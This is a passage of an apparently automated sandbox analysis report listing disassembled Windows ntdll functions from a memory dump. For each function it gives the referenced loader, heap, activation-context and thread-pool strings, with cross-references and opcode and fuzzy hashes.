                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-2973941816
                                                                                    • Opcode ID: 75f2421781778e545e77895543183cc3ce806203cc6026631bee456095846b63
                                                                                    • Instruction ID: 61f32dbe4b7268cf2bc01d231b9d1f1a22b4cd129bdea384660209a17577ac58
                                                                                    • Opcode Fuzzy Hash: 75f2421781778e545e77895543183cc3ce806203cc6026631bee456095846b63
                                                                                    • Instruction Fuzzy Hash: 97215B72188315BBE7289A6D9C86D267F98FB81B74F180105F612D6E80C974DF02C2A2
                                                                                    Function 0185EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                    • API String ID: 0-1109411897
                                                                                    • Opcode ID: 50ac0e9b3fde62f25088e69b33f536ed7eaed3074141cd98f6c965928e2bc1fd
                                                                                    • Instruction ID: 14004180fd15dd59af39f8f4a46c52ea9739a9ea1c8a5905205edbd7cf1f4e08
                                                                                    • Opcode Fuzzy Hash: 50ac0e9b3fde62f25088e69b33f536ed7eaed3074141cd98f6c965928e2bc1fd
                                                                                    • Instruction Fuzzy Hash: 0EA22774A0562A8BDBA5DF18CC887A9BBB5EF49304F1442E9D90AE7351DB349F85CF00
                                                                                    Function 0185ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                    • API String ID: 0-4098886588
                                                                                    • Opcode ID: 187c7a233c6b6d7a365b95074979c5cc30d05f5d1b76b9e5d00b1a4b25928367
                                                                                    • Instruction ID: a2e824de520879e8a1a0298bc156bffbfec19119f1a66b502fccfcbff609c3b3
                                                                                    • Opcode Fuzzy Hash: 187c7a233c6b6d7a365b95074979c5cc30d05f5d1b76b9e5d00b1a4b25928367
                                                                                    • Instruction Fuzzy Hash: D932AC709402698BEBA2CB18C894BEEBBB6FF55344F1441EAEC49E7251D7319F818F50
                                                                                    Function 018863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    • Opcode ID: 3c4ab002f59080bc08c354a1d16ae390907e5f1e386bb704481540ad577c8631
                                                                                    • Instruction ID: ac281fdc0cb7cc21a7e29f4b134ed552e0995b6e57e5f4014d1a15d6d889a161
                                                                                    • Opcode Fuzzy Hash: 3c4ab002f59080bc08c354a1d16ae390907e5f1e386bb704481540ad577c8631
                                                                                    • Instruction Fuzzy Hash: F7913670B043159BEB25EF6CD895FAE7BA2BF41B24F24011DE940EB281EB749B41C791
                                                                                    Function 0184645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018A9A2A
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018A9A11, 018A9A3A
                                                                                    • apphelp.dll, xrefs: 01846496
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 018A9A01
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018A99ED
                                                                                    • LdrpInitShimEngine, xrefs: 018A99F4, 018A9A07, 018A9A30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-204845295
                                                                                    • Opcode ID: e31171cd5c9354a7655de767844f440ab881d90bf1d9e708da230eaf8e756925
                                                                                    • Instruction ID: 8635a44c47c7b208e25b93dac7b7e9cccf97fd57c9530361adf90b0c820d0386
                                                                                    • Opcode Fuzzy Hash: e31171cd5c9354a7655de767844f440ab881d90bf1d9e708da230eaf8e756925
                                                                                    • Instruction Fuzzy Hash: C151B0716083089FE720DF28D891E6B77E9BB84748F54491EF585D7260EA30EB04CB92
                                                                                    Function 0188C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 018C8181, 018C81F5
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 018C8170
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 018C81E5
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0188C6C3
                                                                                    • LdrpInitializeProcess, xrefs: 0188C6C4
                                                                                    • LdrpInitializeImportRedirection, xrefs: 018C8177, 018C81EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    • Opcode ID: cf65d1579987eef20da9245ed591194aac3e9795194b9774fdb3334b88021b1b
                                                                                    • Instruction ID: 4e8b8f38b05221c3d7c9ac0f2f201ca9f8eb69e7f7f4fe6c5799b07a41057a29
                                                                                    • Opcode Fuzzy Hash: cf65d1579987eef20da9245ed591194aac3e9795194b9774fdb3334b88021b1b
                                                                                    • Instruction Fuzzy Hash: 8431F3716483069BC220EB2DD985E1ABBE5AF95B14F04056CF980EB291E724EF04C7A3
                                                                                    Function 01882674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018C2180
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018C21BF
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018C2178
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 018C2165
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 018C2160, 018C219A, 018C21BA
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018C219F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                    • API String ID: 0-861424205
                                                                                    • Opcode ID: 03734d5e57e044463617b880ead0842ab43013a2e3d8077f137ba7c2d410c2f4
                                                                                    • Instruction ID: 98198b1c684d7849c95761189c0ad054a15a2381c9fdfacfed7b653cac1bd65d
                                                                                    • Opcode Fuzzy Hash: 03734d5e57e044463617b880ead0842ab43013a2e3d8077f137ba7c2d410c2f4
                                                                                    • Instruction Fuzzy Hash: AD31377AB4022577E721BA9A8C85F5B7B6ADBD5F40F09405EBB05E7280D270EB01D3E1
                                                                                    Function 0189096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 01892DF0: LdrInitializeThunk.NTDLL ref: 01892DFA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890BA3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890BB6
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890D60
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01890D74
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 1404860816-0
                                                                                    • Opcode ID: 4d17b6022e67d1c0c909fc327ddcb906439485596f03005f88bbe29646aa3d95
                                                                                    • Instruction ID: 31e01fa4a08e50ca555f6f97c8e6c7e4e110c4436f2bb4411258e15201e1c238
                                                                                    • Opcode Fuzzy Hash: 4d17b6022e67d1c0c909fc327ddcb906439485596f03005f88bbe29646aa3d95
                                                                                    • Instruction Fuzzy Hash: 64424A71900715DFDB61CF68C880BAAB7F9BF44314F1845A9E989EB241E770EA84CF61
                                                                                    Function 0185A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                    • API String ID: 0-379654539
                                                                                    • Opcode ID: 0d1a35f85678d8d0d64e3e2b2172c395a1910b37d4ebbabfcef8a3fc44d1d0ad
                                                                                    • Instruction ID: fd3ea969cd5d34d17b2e734040e1910e4ba4603d46c44f9a911f58f3f712a769
                                                                                    • Opcode Fuzzy Hash: 0d1a35f85678d8d0d64e3e2b2172c395a1910b37d4ebbabfcef8a3fc44d1d0ad
                                                                                    • Instruction Fuzzy Hash: 6BC15B741083868FD759CF98C084B6ABBE4FF88748F044A6AF995CB251E734DA49CB52
                                                                                    Function 01888402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • @, xrefs: 01888591
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01888421
                                                                                    • LdrpInitializeProcess, xrefs: 01888422
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0188855E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    • Opcode ID: 5dd72ec77a5966f967f84e173e64c65afbd51bbe6b448049cc073e7387aaa53c
                                                                                    • Instruction ID: 575b6da7c5730dba594451920abbdbee9680ca66d611c1b628a5e0bee8aa84ca
                                                                                    • Opcode Fuzzy Hash: 5dd72ec77a5966f967f84e173e64c65afbd51bbe6b448049cc073e7387aaa53c
                                                                                    • Instruction Fuzzy Hash: A1918E71508345AFDB21EF69CC84E6BBAE8BF85754F84092EFA84D2151E334DB44CB62
                                                                                    Function 0188273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • .Local, xrefs: 018828D8
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018C21D9, 018C22B1
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 018C21DE
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018C22B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: 373f0c757e5b99c0c82ced442076d74e3f1d8a0a4a73520e2f07223a98daa334
                                                                                    • Instruction ID: d02da71fcfc9e461818d470323ca22486478b9a6d839c5c58a3d104b5bcb8239
                                                                                    • Opcode Fuzzy Hash: 373f0c757e5b99c0c82ced442076d74e3f1d8a0a4a73520e2f07223a98daa334
                                                                                    • Instruction Fuzzy Hash: CCA1AD3590022A9BDB25EF68CC84BA9B7B6BF58754F1441EAD908E7291D730DF80CF90
                                                                                    Function 01884AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 018C342A
                                                                                    • RtlDeactivateActivationContext, xrefs: 018C3425, 018C3432, 018C3451
                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 018C3456
                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 018C3437
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                    • API String ID: 0-1245972979
                                                                                    • Opcode ID: e18d17461f36a0f97b8ac297990ae5606dc391f07f80a841ed9e251a8b836977
                                                                                    • Instruction ID: 68a773ef742e9ef1d95b762e8c3cbf2d4ba481ab76a94244eef2bfd2de39d9a0
                                                                                    • Opcode Fuzzy Hash: e18d17461f36a0f97b8ac297990ae5606dc391f07f80a841ed9e251a8b836977
                                                                                    • Instruction Fuzzy Hash: 9561FF36640B129BD722DF1DC881B2AF7A5AFA0B14F18852DE955DB240DB34EA02CB91
                                                                                    Function 018564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 018B1028
                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018B10AE
                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 018B106B
                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 018B0FE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                    • API String ID: 0-1468400865
                                                                                    • Opcode ID: 582a75676490356d6f449afe5a5a4191d5baf8a99e54a36e9f9f56969ff5b4d9
                                                                                    • Instruction ID: bb5a4ba784e4389d53e7f8d0bb6abce5221b3a0ed4827a3a07836768d2a9c7b1
                                                                                    • Opcode Fuzzy Hash: 582a75676490356d6f449afe5a5a4191d5baf8a99e54a36e9f9f56969ff5b4d9
                                                                                    • Instruction Fuzzy Hash: C471E071944305AFCB61DF18C884B9B7BA8EF55768F940468FD49CB246E734D288CBD2
                                                                                    Function 0187245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpDynamicShimModule, xrefs: 018BA998
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018BA9A2
                                                                                    • apphelp.dll, xrefs: 01872462
                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 018BA992
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-176724104
                                                                                    • Opcode ID: bc95663a926c956c0d3e56c7881493f6410dc340a3401703c1c9d648c6cc6337
                                                                                    • Instruction ID: 24e4507c6859b76430214a7bdd43687eb63ecfad1578204d03a4c0ec72382fb4
                                                                                    • Opcode Fuzzy Hash: bc95663a926c956c0d3e56c7881493f6410dc340a3401703c1c9d648c6cc6337
                                                                                    • Instruction Fuzzy Hash: F5314679600206ABEB39DF6DC8C1EAABBB5FB84B04F160019F910E7345D7709B81C791
                                                                                    Function 018629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • HEAP: , xrefs: 01863264
                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0186327D
                                                                                    • HEAP[%wZ]: , xrefs: 01863255
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                    • API String ID: 0-617086771
                                                                                    • Opcode ID: 371259646dad2430d0e28107a68d4f0fcb1f27a41a6ca0deb1c74821c0c37042
                                                                                    • Instruction ID: 9ec07c18247587cbe4c78885d617931bf3eaa0192ad3ab729852b27f41fd9951
                                                                                    • Opcode Fuzzy Hash: 371259646dad2430d0e28107a68d4f0fcb1f27a41a6ca0deb1c74821c0c37042
                                                                                    • Instruction Fuzzy Hash: D392AC71A04249DFDB25CF68C444BADBBF6FF48304F1880A9E859EB392D735AA45CB50
                                                                                    Function 01860770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-4253913091
                                                                                    • Opcode ID: 25b1dab40e070aa3efe92b7ed187c1d66bb8d65670af3d30c8c5905d271393aa
                                                                                    • Instruction ID: 7bdee9afd174bdda05caceb442870aed2626a9522ed34c889cc869fc30643e50
                                                                                    • Opcode Fuzzy Hash: 25b1dab40e070aa3efe92b7ed187c1d66bb8d65670af3d30c8c5905d271393aa
                                                                                    • Instruction Fuzzy Hash: F4F1AE30A0060ADFEB25CF68C894BAAB7FAFF44704F144168E556DB381D734EA81CB95
                                                                                    Function 01876962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $@
                                                                                    • API String ID: 0-1077428164
                                                                                    • Opcode ID: b567012ed6c5767bcb69cd97f5bac33121957ba9a0a102b02f2aa038579f1ff7
                                                                                    • Instruction ID: 72d16316d84e9daa7c934535f00ed12415f76ae3979574be9bb56c4b718e41ca
                                                                                    • Opcode Fuzzy Hash: b567012ed6c5767bcb69cd97f5bac33121957ba9a0a102b02f2aa038579f1ff7
                                                                                    • Instruction Fuzzy Hash: 4EC2AF716087459FEB25CF28C884BABBBE5AF89714F04892DF999C7341E734DA04CB52
                                                                                    Function 0184A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    • Opcode ID: 7cd060681522b40b7ae23f6cabd257631b3a694e8efe15a03f9d797fb6da90c8
                                                                                    • Instruction ID: 703cc8c90dc91be17590a259137a6c40cefeec0793d7b06e953a96f0fab48125
                                                                                    • Opcode Fuzzy Hash: 7cd060681522b40b7ae23f6cabd257631b3a694e8efe15a03f9d797fb6da90c8
                                                                                    • Instruction Fuzzy Hash: 49A16B769116299BEB31DF68CC88BAAB7B8EF44710F1001E9E909EB250D7359F84CF51
                                                                                    Function 01870BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpCheckModule, xrefs: 018BA117
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018BA121
                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 018BA10F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-161242083
                                                                                    • Opcode ID: d0fbac595764a269c3a82e75e4b90d6865f5eefc959f08dccd43eda256894efe
                                                                                    • Instruction ID: 0b62358884c9ca1905b99a4da1b6a94fb489053bf11000fc50d57843b0d0c1b6
                                                                                    • Opcode Fuzzy Hash: d0fbac595764a269c3a82e75e4b90d6865f5eefc959f08dccd43eda256894efe
                                                                                    • Instruction Fuzzy Hash: 3B719D74A0020ADFDB29DF6CC981AAEB7F4EB85708F18402DE946E7351E634AB41CB51
                                                                                    Function 01860A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                    • API String ID: 0-1334570610
                                                                                    • Opcode ID: 14d9e632b53fc218c58e6456c85796ee7d1030b758772b4d6c6bfa5874431625
                                                                                    • Instruction ID: 773cdf607f4576d9ffe7ffddafa2c0dccbcc3821cd2cdf3218978ae87698cdea
                                                                                    • Opcode Fuzzy Hash: 14d9e632b53fc218c58e6456c85796ee7d1030b758772b4d6c6bfa5874431625
                                                                                    • Instruction Fuzzy Hash: 1161AE70604306DFDB29CF28C480BAABBE5FF45708F148559E49ACB396D770EA81CB95
                                                                                    Function 0188C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 018C82DE
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018C82E8
                                                                                    • Failed to reallocate the system dirs string !, xrefs: 018C82D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1783798831
                                                                                    • Opcode ID: 9c87f68726f8ba42d1d8550ab97e8f64c2ff20b6c8084262b4979831f47bca01
                                                                                    • Instruction ID: 07cb9dbbb9de799c54d8f30cb900fd05aa06418f71e75dbc0fc65d8ae1ee02ce
                                                                                    • Opcode Fuzzy Hash: 9c87f68726f8ba42d1d8550ab97e8f64c2ff20b6c8084262b4979831f47bca01
                                                                                    • Instruction Fuzzy Hash: EB41E1B5544315ABC731FB6CD844F9B77E8EB49B58F00492AF948D3258EB70DA008BA2
                                                                                    Function 0190C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0190C1C5
                                                                                    • @, xrefs: 0190C1F1
                                                                                    • PreferredUILanguages, xrefs: 0190C212
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                    • API String ID: 0-2968386058
                                                                                    • Opcode ID: c5d4642e6b88d01a0187aa2cc91468202a07f1709e915a9b702acea590c555f8
                                                                                    • Instruction ID: 97bc7dbe9b71126748025a91b88f78dd4bddd8a8cff3715d8ba0620d0352424c
